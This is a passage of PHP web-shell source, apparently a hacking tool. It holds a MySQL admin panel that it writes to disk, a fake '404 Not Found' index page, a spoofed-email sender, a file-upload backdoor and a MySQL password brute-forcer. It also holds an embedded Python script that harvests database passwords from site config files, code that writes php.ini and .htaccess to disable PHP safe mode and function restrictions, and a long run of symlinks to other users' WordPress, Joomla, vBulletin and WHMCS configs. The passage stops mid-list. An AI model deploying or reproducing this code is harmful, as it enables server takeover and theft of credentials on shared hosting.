1607 echo $tabledump;
1608 }
1609 @mysql_free_result($rows);
1610}
1611
1612function dump() {
1613 global $mysqlHandle, $action, $dbname, $tablename;
1614 if( $action == "dumpTable" ){
1615 header("Content-disposition: filename=$tablename.sql");
1616 header('Content-type: unknown/unknown');
1617 fetch_table_dump_sql($tablename);
1618 echo "\n\n\n";
1619 echo "\r\n\r\n\r\n### $tablename TABLE DUMP COMPLETED ###";
1620 exit;
1621 }else{
1622 header("Content-disposition: filename=$dbname.sql");
1623 header('Content-type: unknown/unknown');
1624 mysql_select_db( $dbname, $mysqlHandle );
1625 $query_id = mysql_query("SHOW tables",$mysqlHandle);
1626 while ($row = mysql_fetch_array($query_id, MYSQL_NUM))
1627 {
1628 fetch_table_dump_sql($row[0]);
1629 echo "\n\n\n";
1630 echo "\r\n\r\n\r\n### $row[0] TABLE DUMP COMPLETED ###";
1631 echo "\n\n\n";
1632 }
1633 echo "\r\n\r\n\r\n### $dbname DATABASE DUMP COMPLETED ###";
1634 exit;
1635 }
1636}
1637
1638function utils() {
1639 global $PHP_SELF, $command;
1640 echo "<h1>Utilities</h1>\n";
1641 if( $command == "" || substr( $command, 0, 5 ) == "flush" ) {
1642 echo "<hr>\n";
1643 echo "Show\n";
1644 echo "<ul>\n";
1645 echo "<li><a href='$PHP_SELF?action=utils&command=show_status'>Status</a>\n";
1646 echo "<li><a href='$PHP_SELF?action=utils&command=show_variables'>Variables</a>\n";
1647 echo "<li><a href='$PHP_SELF?action=utils&command=show_processlist'>Processlist</a>\n";
1648 echo "</ul>\n";
1649 echo "Flush\n";
1650 echo "<ul>\n";
1651 echo "<li><a href='$PHP_SELF?action=utils&command=flush_hosts'>Hosts</a>\n";
1652 if( $command == "flush_hosts" ) {
1653 if( mysql_query( "Flush hosts" ) != false )
1654 echo "- Success";
1655 else
1656 echo "- Fail";
1657 }
1658 echo "<li><a href='$PHP_SELF?action=utils&command=flush_logs'>Logs</a>\n";
1659 if( $command == "flush_logs" ) {
1660 if( mysql_query( "Flush logs" ) != false )
1661 echo "- Success";
1662 else
1663 echo "- Fail";
1664 }
1665 echo "<li><a href='$PHP_SELF?action=utils&command=flush_privileges'>Privileges</a>\n";
1666 if( $command == "flush_privileges" ) {
1667 if( mysql_query( "Flush privileges" ) != false )
1668 echo "- Success";
1669 else
1670 echo "- Fail";
1671 }
1672 echo "<li><a href='$PHP_SELF?action=utils&command=flush_tables'>Tables</a>\n";
1673 if( $command == "flush_tables" ) {
1674 if( mysql_query( "Flush tables" ) != false )
1675 echo "- Success";
1676 else
1677 echo "- Fail";
1678 }
1679 echo "<li><a href='$PHP_SELF?action=utils&command=flush_status'>Status</a>\n";
1680 if( $command == "flush_status" ) {
1681 if( mysql_query( "Flush status" ) != false )
1682 echo "- Success";
1683 else
1684 echo "- Fail";
1685 }
1686 echo "</ul>\n";
1687 } else {
1688 $queryStr = ereg_replace( "_", " ", $command );
1689 $pResult = mysql_query( $queryStr );
1690 if( $pResult == false ) {
1691 echo "Fail";
1692 return;
1693 }
1694 $col = mysql_num_fields( $pResult );
1695 echo "<p class=location>$queryStr</p>\n";
1696 echo "<hr>\n";
1697 echo "<table cellspacing=1 cellpadding=2 border=0>\n";
1698 echo "<tr>\n";
1699 for( $i = 0; $i < $col; $i++ ) {
1700 $field = mysql_fetch_field( $pResult, $i );
1701 echo "<th>".$field->name."</th>\n";
1702 }
1703 echo "</tr>\n";
1704 while( 1 ) {
1705 $rowArray = mysql_fetch_row( $pResult );
1706 if( $rowArray == false ) break;
1707 echo "<tr>\n";
1708 for( $j = 0; $j < $col; $j++ )
1709 echo "<td>".htmlspecialchars( $rowArray[$j] )."</td>\n";
1710 echo "</tr>\n";
1711 }
1712 echo "</table>\n";
1713 }
1714}
1715function footer_html() {
1716 global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $USERNAME;
1717 echo "<hr>\n";
1718 echo "<span class=\"new\">[$USERNAME]</span> - \n";
1719 echo "<a href='$PHP_SELF?action=bGlzdERCcw=='>Database List</a> | \n";
1720 if( $tablename != "" )
1721 echo "<a href='$PHP_SELF?action=listTables&dbname=$dbname&tablename=$tablename'>Table List</a> | ";
1722 echo "<a href='$PHP_SELF?action=utils'>Utils</a> |\n";
1723 echo "<a href='$PHP_SELF?action=logout'>Logout</a>\n";
1724}
1725//------------- MAIN ------------- //
1726error_reporting(0);
1727ini_set ('display_errors', 0);
1728ini_set ('log_errors', 0);
1729if( $action == "logon" || $action == "" || $action == "logout" )
1730 logon();
1731else if( $action == "bG9nb25fc3VibWl0" )
1732 logon_submit();
1733else if( $action == "dumpTable" || $action == "dumpDB" ) {
1734 while( list($var, $value) = each($hxxp_COOKIE_VARS) ) {
1735 if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
1736 if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
1737 if( $var == "mysql_web_admin_hostname" ) $HOSTNAME = $value;
1738 }
1739 $mysqlHandle = @mysql_connect( $HOSTNAME.":3306", $USERNAME, $PASSWORD );
1740 dump();
1741} else {
1742 while( list($var, $value) = each($hxxp_COOKIE_VARS) ) {
1743 if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
1744 if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
1745 if( $var == "mysql_web_admin_hostname" ) $HOSTNAME = $value;
1746 }
1747 echo "<!--";
1748 $mysqlHandle = @mysql_connect( $HOSTNAME.":3306", $USERNAME, $PASSWORD );
1749 echo "-->";
1750 if( $mysqlHandle == false ) {
1751 echo "<table width=100% height=100%><tr><td><center>\n";
1752 echo "<h1>Wrong Password!</h1>\n";
1753 echo "<a href='$PHP_SELF?action=logon'>Logon</a>\n";
1754 echo "</center></td></tr></table>\n";
1755 } else {
1756 if( $action == "bGlzdERCcw==" )
1757 listDatabases();
1758 else if( $action == "createDB" )
1759 createDatabase();
1760 else if( $action == "dropDB" )
1761 dropDatabase();
1762 else if( $action == "listTables" )
1763 listTables();
1764 else if( $action == "createTable" )
1765 createTable();
1766 else if( $action == "dropTable" )
1767 dropTable();
1768 else if( $action == "viewSchema" )
1769 viewSchema();
1770 else if( $action == "query" )
1771 viewData( $queryStr );
1772 else if( $action == "addField" )
1773 manageField( "add" );
1774 else if( $action == "addField_submit" )
1775 manageField_submit( "add" );
1776 else if( $action == "editField" )
1777 manageField( "edit" );
1778 else if( $action == "editField_submit" )
1779 manageField_submit( "edit" );
1780 else if( $action == "dropField" )
1781 dropField();
1782 else if( $action == "dmlld0RhdGE=" )
1783 viewData( "" );
1784 else if( $action == "addData" )
1785 manageData( "add" );
1786 else if( $action == "addData_submit" )
1787 manageData_submit( "add" );
1788 else if( $action == "editData" )
1789 manageData( "edit" );
1790 else if( $action == "editData_submit" )
1791 manageData_submit( "edit" );
1792 else if( $action == "deleteData" )
1793 deleteData();
1794 else if( $action == "utils" )
1795 utils();
1796 mysql_close( $mysqlHandle);
1797 footer_html();
1798 }
1799}
1800?>
1801<html>
1802<head>
1803<title>MySQL Interface (Developed By Mohajer22)</title>
1804<body bgColor=#000000 >
1805<style type="text/css">
1806<!--
1807p.location {
1808 color: #00FF00;
1809}
1810h1, h2, h3 {
1811 color: #00FF00;
1812}
1813th {
1814 background-color: #222222;
1815 color: #00FF00;
1816 font-size: small;
1817}
1818td {
1819 color: #00FF00;
1820 background-color: #444444;
1821 font-size: small;
1822}
1823form {
1824 margin-top: 0;
1825 margin-bottom: 0;
1826}
1827a {
1828 text-decoration:none;
1829 color: #00FF00;
1830 font-size:small;
1831}
1832A:link {
1833COLOR:#FFFFFF;
1834TEXT-DECORATION: none
1835}
1836A:visited {
1837COLOR:#00FF00;
1838TEXT-DECORATION: none
1839}
1840A:active {
1841COLOR:#00FF00;
1842TEXT-DECORATION: none
1843}
1844A:hover {
1845color:#00FF00;
1846TEXT-DECORATION: none
1847}
1848input, select, textarea {
1849background-color: #000000;
1850border-style: solid;
1851font-family: Tahoma,Verdana,Arial,Sans-Serif;
1852font-size:small;
1853color: #00FF00;
1854padding: 0px;
1855}
1856li {
1857color: #00FF00;
1858}
1859.new {
1860color: #00FF00;
1861}
1862//-->
1863</style>
1864</head>'; $file = fopen("db-sql.php" ,"w+"); $write = fwrite ($file ,base64_decode($sqlshell)); fclose($file); chmod("db-sql.php", 0644); $indexshell = fopen("index.php" ,"w+"); $data = '<h1>Not Found</h1>
1865<p>The requested URL was not found on this server.</p>
1866<hr>
1867<address>Apache Server at <?=$_SERVER['hxxp_HOST']?> Port 80</address>
1868 <style>
1869 input { margin:0;background-color:#fff;border:1px solid #fff; }
1870 </style>'; $tulis = fwrite( $indexshell, base64_decode($data)); fclose($indexshell); echo "<iframe src=mysql/db-sql.php width=97% height=100% frameborder=0></iframe>"; } elseif(isset($_GET['x']) && ($_GET['x'] == 'mail')){ if(isset($_POST['mail_send'])){ $mail_to = $_POST['mail_to']; $mail_from = $_POST['mail_from']; $mail_subject = $_POST['mail_subject']; $mail_content = magicboom($_POST['mail_content']); if(@mail($mail_to,$mail_subject,$mail_content,"FROM:$mail_from")){ $msg = "email sent to $mail_to"; } else $msg = "send email failed"; } ?>
1871<form action="?y=<?php echo $pwd; ?>&x=mail" method="post">
1872<table class="cmdbox">
1873<tr><td>
1874<textarea class="output" name="mail_content" id="cmd" style="height:340px;">Hey there, please patch me A.S.A.P</textarea>
1875<tr><td> <input class="inputz" style="width:20%;" type="text" value="admin@somesome.com" name="mail_to" /> mail to</td></tr>
1876<tr><td> <input class="inputz" style="width:20%;" type="text" value="BlackEagle@fbi.gov" name="mail_from" /> from</td></tr>
1877<tr><td> <input class="inputz" style="width:20%;" type="text" value="patch me" name="mail_subject" /> subject</td></tr>
1878<tr><td> <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="mail_send" /></td></tr></form>
1879<tr><td> <?php echo $msg; ?></td></tr>
1880</table>
1881</form>
1882
1883<?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo')){ @ob_start(); @eval("phpinfo();"); $buff = @ob_get_contents(); @ob_end_clean(); $awal = strpos($buff,"<body>")+6; $akhir = strpos($buff,"</body>"); echo "<div class=\"phpinfo\">".substr($buff,$awal,$akhir-$awal)."</div>"; } elseif(isset($_GET['view']) && ($_GET['view'] != "")){ if(is_file($_GET['view'])){ if(!isset($file)) $file = magicboom($_GET['view']); if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $filn = basename($file); echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\">
1884 <tr><td>Filename</td><td><span id=\"".clearspace($filn)."_link\">".$file."</span>
1885 <form action=\"?y=".$pwd."&view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
1886 <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" />
1887 <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" />
1888 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
1889 <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" />
1890 </form>
1891 </td></tr>
1892 <tr><td>Size</td><td>".ukuran($file)."</td></tr>
1893 <tr><td>Permission</td><td>".get_perms($file)."</td></tr>
1894 <tr><td>Owner</td><td>".$owner."</td></tr>
1895 <tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr>
1896 <tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr>
1897 <tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr>
1898 <tr><td>Actions</td><td><a href=\"?y=$pwd&edit=$file\">edit</a> | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">rename</a> | <a href=\"?y=$pwd&delete=$file\">delete</a> | <a href=\"?y=$pwd&dl=$file\">download</a> (<a href=\"?y=$pwd&dlgzip=$file\">gzip</a>)</td></tr>
1899 <tr><td>View</td><td><a href=\"?y=".$pwd."&view=".$file."\">text</a> | <a href=\"?y=".$pwd."&view=".$file."&type=code\">code</a> | <a href=\"?y=".$pwd."&view=".$file."&type=image\">image</a></td></tr>
1900 </table>
1901 "; if(isset($_GET['type']) && ($_GET['type']=='image')){ echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?y=".$pwd."&img=".$filn."\"></div>"; } elseif(isset($_GET['type']) && ($_GET['type']=='code')){ echo "<div class=\"viewfile\">"; $file = wordwrap(@file_get_contents($file),"240","\n"); @highlight_string($file); echo "</div>"; } else { echo "<div class=\"viewfile\">"; echo nl2br(htmlentities((@file_get_contents($file)))); echo "</div>"; } } elseif(is_dir($_GET['view'])){ echo showdir($pwd,$prompt); } } elseif(isset($_GET['edit']) && ($_GET['edit'] != "")){ if(isset($_POST['save'])){ $file = $_POST['saveas']; $content = magicboom($_POST['content']); if($filez = @fopen($file,"w")){ $time = date("d-M-Y H:i",time()); if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time; else $msg = "failed to save"; @fclose($filez); } else $msg = "permission denied"; } if(!isset($file)) $file = $_GET['edit']; if($filez = @fopen($file,"r")){ $content = ""; while(!feof($filez)){ $content .= htmlentities(str_replace("''","'",fgets($filez))); } @fclose($filez); } ?>
1902<form action="?y=<?php echo $pwd; ?>&edit=<?php echo $file; ?>" method="post">
1903<table class="cmdbox">
1904<tr><td colspan="2">
1905<textarea class="output" name="content">
1906<?php echo $content; ?>
1907</textarea>
1908<tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" /><input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" />
1909 <?php echo $msg; ?></td></tr>
1910</table>
1911</form>
1912<?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'logout')) { ?>
1913<form action="?y=<?php echo $pwd; ?>&x=logout" method="post">
1914
1915<?php unset($_SESSION[md5($_SERVER['hxxp_HOST'])]); echo 'bye!'; } elseif(isset($_GET['x']) && ($_GET['x'] == 'brute')) { ?>
1916 <form action="?y=<?php echo $pwd; ?>&x=brute" method="post">
1917 <?php ?>
1918<meta hxxp-equiv="Content-Type" content="text/html; charset=utf-8" />
1919<?php @set_time_limit(0); @error_reporting(0); if($_POST['page']=='find') { if(isset($_POST['usernames']) && isset($_POST['passwords'])) { if($_POST['type'] == 'passwd'){ $e = explode("\n",$_POST['usernames']); foreach($e as $value){ $k = explode(":",$value); $username .= $k['0']." "; } }elseif($_POST['type'] == 'simple'){ $username = str_replace("\n",' ',$_POST['usernames']); } $a1 = explode(" ",$username); $a2 = explode("\n",$_POST['passwords']); $id2 = count($a2); $ok = 0; foreach($a1 as $user ) { if($user !== '') { $user=trim($user); for($i=0;$i<=$id2;$i++) { $pass = trim($a2[$i]); if(@mysql_connect('localhost',$user,$pass)) { echo "Gca~ user is (<b><font color=green>$user</font></b>) Password is (<b><font color=green>$pass</font></b>)<br />"; $ok++; } } } } echo "<hr><b>You Found <font color=green>$ok</font> Cpanel</b>"; echo "<center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>"; exit; } } if($_POST['pass']=='password'){ @error_reporting(0); $i = getenv('REMOTE_ADDR'); $d = date('D, M jS, Y H:i',time()); $h = $_SERVER['hxxp_HOST']; $dir=$_SERVER['PHP_SELF']; $back = "<?php
1920echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
1921echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
1922if( $_POST['_upl'] == "Upload" ) {
1923if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Korang Dah Berjaya Upload Shell Korang!!!<b><br><br>'; }
1924else { echo '<b>Korang Gagal Upload Shell Korang!!!</b><br><br>'; }
1925}
1926?>"; $file = fopen(".php","w+"); $write = fwrite ($file ,base64_decode($back)); fclose($file); chmod(".php",0755); mkdir('config',0755); $cp = '#!/usr/bin/env python
1927
1928'''
1929By: Ahmed Shawky aka lnxg33k
1930thx: Obzy, Relik, mohab and #arabpwn
1931'''
1932
1933import sys
1934import os
1935import re
1936import subprocess
1937import urllib
1938import glob
1939from platform import system
1940
1941if len(sys.argv) != 3:
1942 print'''
1943 Usage: %s [URL...] [directory...]
1944 Ex) %s hxxp://www.test.com/test/ [dir ...]''' % (sys.argv[0], sys.argv[0])
1945 sys.exit(1)
1946
1947site = sys.argv[1]
1948fout = sys.argv[2]
1949
1950try:
1951 req = urllib.urlopen(site)
1952 read = req.read()
1953 if system() == 'Linux':
1954 f = open('/tmp/data.txt', 'w')
1955 f.write(read)
1956 f.close()
1957 if system() == 'Windows':
1958 f = open('data.txt', 'w')
1959 f.write(read)
1960 f.close()
1961
1962 i = 0
1963 if system() == 'Linux':
1964 f = open('/tmp/data.txt', 'rU')
1965 for line in f:
1966 if line.startswith('<li><a') == True :
1967 m = re.search(r'(<a href=")(.+[^>])(">)', line)
1968 i += 1
1969 local_name = '%s/file%d.txt' % (fout, i)
1970 print 'Retrieving...\t\t', site + m.group(2)
1971 try: urllib.urlretrieve(site + m.group(2), local_name)
1972 except IOError:
1973 print '\n[%s] doesn\'t exist, create it first' % fout
1974 sys.exit()
1975 if line.startswith('<img') == True:
1976 m1 = re.search(r'(<a href=")(.+[^>])(">)', line)
1977 i += 1
1978 local_name = '%s/file%d.txt' % (fout, i)
1979 print 'Retrieving...\t\t', site + m1.group(2)
1980 try: urllib.urlretrieve(site + m1.group(2), local_name)
1981 except IOError:
1982 print '\n[%s] doesn\'t exist, create it first' % fout
1983 sys.exit()
1984 if line.startswith('<IMG') == True:
1985 m2 = re.search(r'(<A HREF=")(.+[^>])(">)', line)
1986 i += 1
1987 local_name = '%s/file%d.txt' % (fout, i)
1988 print 'Retrieving...\t\t', site + m2.group(2)
1989 try: urllib.urlretrieve(site + m2.group(2), local_name)
1990 except IOError:
1991 print '\n[%s] doesn\'t exist, create it first' % fout
1992 sys.exit()
1993 f.close()
1994 if system() == 'Windows':
1995 f = open('data.txt', 'rU')
1996 for line in f:
1997 if line.startswith('<li><a') == True :
1998 m = re.search(r'(<a href=")(.+[^>])(">)', line)
1999 i += 1
2000 local_name = '%s/file%d.txt' % (fout, i)
2001 print 'Retrieving...\t\t', site + m.group(2)
2002 try: urllib.urlretrieve(site + m.group(2), local_name)
2003 except IOError:
2004 print '\n[%s] doesn\'t exist, create it first' % fout
2005 sys.exit()
2006 if line.startswith('<img') == True:
2007 m1 = re.search(r'(<a href=")(.+[^>])(">)', line)
2008 i += 1
2009 local_name = '%s/file%d.txt' % (fout, i)
2010 print 'Retrieving...\t\t', site + m1.group(2)
2011 try: urllib.urlretrieve(site + m1.group(2), local_name)
2012 except IOError:
2013 print '\n[%s] doesn\'t exist, create it first' % fout
2014 sys.exit()
2015 if line.startswith('<IMG') == True:
2016 m2 = re.search(r'(<A HREF=")(.+[^>])(">)', line)
2017 i += 1
2018 local_name = '%s/file%d.txt' % (fout, i)
2019 print 'Retrieving...\t\t', site + m2.group(2)
2020 try: urllib.urlretrieve(site + m2.group(2), local_name)
2021 except IOError:
2022 print '\n[%s] doesn\'t exist, create it first' % fout
2023 sys.exit()
2024 f.close()
2025 if system() == 'Linux':
2026 cleanup = subprocess.Popen('rm -rf /tmp/data.txt > /dev/null', shell=True).wait()
2027 if system() == 'Windows':
2028 cleanup = subprocess.Popen('del C:\data.txt', shell=True).wait()
2029 print '\n', '-' * 100, '\n'
2030 if system() == 'Linux':
2031 for root, dirs, files in os.walk(fout):
2032 for fname in files:
2033 fullpath = os.path.join(root, fname)
2034 f = open(fullpath, 'r')
2035 for line in f:
2036 secr = re.search (r"(db_password'] = ')(.+[^>])(';)", line)
2037 if secr is not None: print (secr.group(2))
2038 secr1 = re.search(r"(password = ')(.+[^>])(';)", line)
2039 if secr1 is not None: print (secr1.group(2))
2040 secr2 = re.search(r"(DB_PASSWORD')(...)(.+[^>])(')", line)
2041 if secr2 is not None: print (secr2.group(3))
2042 secr3 = re.search (r"(dbpass =..)(.+[^>])(.;)", line)
2043 if secr3 is not None: print (secr3.group(2))
2044 secr4 = re.search (r"(DBPASSWORD = ')(.+[^>])(.;)", line)
2045 if secr4 is not None: print (secr4.group(2))
2046 secr5 = re.search (r"(DBpass = ')(.+[^>])(';)", line)
2047 if secr5 is not None: print (secr5.group(2))
2048 secr6 = re.search (r"(dbpasswd = ')(.+[^>])(';)", line)
2049 if secr6 is not None: print (secr6.group(2))
2050 secr7 = re.search (r"(mosConfig_password = ')(.+[^>])(';)", line)
2051 if secr7 is not None: print (secr7.group(2))
2052 f.close()
2053 if system() == 'Windows':
2054 for infile in glob.glob( os.path.join(fout, '*.txt') ):
2055 f = open(infile, 'r')
2056 for line in f:
2057 secr = re.search (r"(db_password'] = ')(.+[^>])(';)", line)
2058 if secr is not None: print (secr.group(2))
2059 secr1 = re.search(r"(password = ')(.+[^>])(';)", line)
2060 if secr1 is not None: print (secr1.group(2))
2061 secr2 = re.search(r"(DB_PASSWORD')(...)(.+[^>])(')", line)
2062 if secr2 is not None: print (secr2.group(3))
2063 secr3 = re.search (r"(dbpass =..)(.+[^>])(.;)", line)
2064 if secr3 is not None: print (secr3.group(2))
2065 secr4 = re.search (r"(DBPASSWORD = ')(.+[^>])(.;)", line)
2066 if secr4 is not None: print (secr4.group(2))
2067 secr5 = re.search (r"(DBpass = ')(.+[^>])(';)", line)
2068 if secr5 is not None: print (secr5.group(2))
2069 secr6 = re.search (r"(dbpasswd = ')(.+[^>])(';)", line)
2070 if secr6 is not None: print (secr6.group(2))
2071 secr7 = re.search (r"(mosConfig_password = ')(.+[^>])(';)", line)
2072 if secr7 is not None: print (secr7.group(2))
2073 f.close()
2074except (KeyboardInterrupt):
2075 print '\nThanks for using it ._^''; $file = fopen("cp.py","w+"); $write = fwrite ($file ,base64_decode($cp)); fclose($file); chmod("cp.py",0755); $url = $_POST['url']; echo"<center>
2076<textarea cols=\"90\" rows=\"20\" name=\"usernames\">"; system("python cp.py $url config"); unlink ('cp.py'); echo"</textarea>
2077</center>"; echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>"; exit; } if($_POST['matikan']=='sekatan'){ @error_reporting(0); $phpini = 'c2FmZV9tb2RlPU9GRg0KZGlzYWJsZV9mdW5jdGlvbnM9Tk9ORQ=='; $file = fopen("php.ini","w+"); $write = fwrite ($file ,base64_decode($phpini)); fclose($file); $htaccess = 'T3B0aW9ucyBGb2xsb3dTeW1MaW5rcyBNdWx0aVZpZXdzIEluZGV4ZXMgRXhlY0NHSQ=='; $file = fopen(".htaccess","w+"); $write = fwrite ($file ,base64_decode($htaccess)); echo "<hr><center><b>DONE!"; echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>"; exit; } if($_POST['mendapatkan']=='passwd'){ @set_magic_quotes_runtime(0); ob_start(); error_reporting(0); @set_time_limit(0); @ini_set('max_execution_time',0); @ini_set('output_buffering',0); $fn = $_POST['foldername']; function syml($usern,$pdomain) { symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home2/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home2/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home2/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home2/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home2/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home2/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home2/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home2/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home2/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home2/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home2/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home2/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home2/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home2/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home2/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home2/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home2/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home2/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home2/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home2/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home2/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home2/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home2/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home2/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home2/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home3/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home3/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home3/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home3/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home3/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home3/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home3/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home3/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home3/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); 